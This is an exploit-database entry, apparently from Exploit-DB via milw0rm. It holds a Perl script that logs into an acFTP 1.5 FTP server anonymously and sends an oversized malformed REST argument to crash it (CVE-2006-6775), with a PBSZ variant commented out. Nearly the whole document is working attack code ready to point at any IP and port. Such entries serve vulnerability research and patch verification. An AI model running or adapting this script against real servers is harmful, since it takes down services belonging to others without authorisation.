acFTP FTP Server 1.5 - 'REST/PBSZ' Remote Denial of Service

Author: gbr
type: dos
platform: windows
port: 
date_added: 2006-12-22 
date_updated: 2011-04-27 
verified: 1 
codes: OSVDB-32446;CVE-2006-6775 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comacFTP-1.5.zip

#################################################
# acFTP 1.5 (REST/PBSZ) Denial of Service       #
# author: gbr                                   #
# mail: gabrielquadros[at]hotmail.com           #
#################################################


use IO::Socket;

if(!defined($ARGV[0])) {
       print "Usage: $0 ip port\n";
       exit;
}

my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
                               PeerPort => $ARGV[1],
                               Proto    => 'tcp')
       or die "Could not open a socket: $!\n";

$sock->recv($buf, 1024);
$sock->send("USER anonymous\r\n");
$sock->recv($buf, 1024);
$sock->send("PASS anonymous\r\n");
$sock->recv($buf, 1024);
for($i=0; $i<10; $i++) {
       $data .= "{}*{";
}

$sock->send("REST $data\r\n");
# $sock->send("PBSZ $data\r\n");

print "Server exploited\n";

# milw0rm.com [2006-12-23]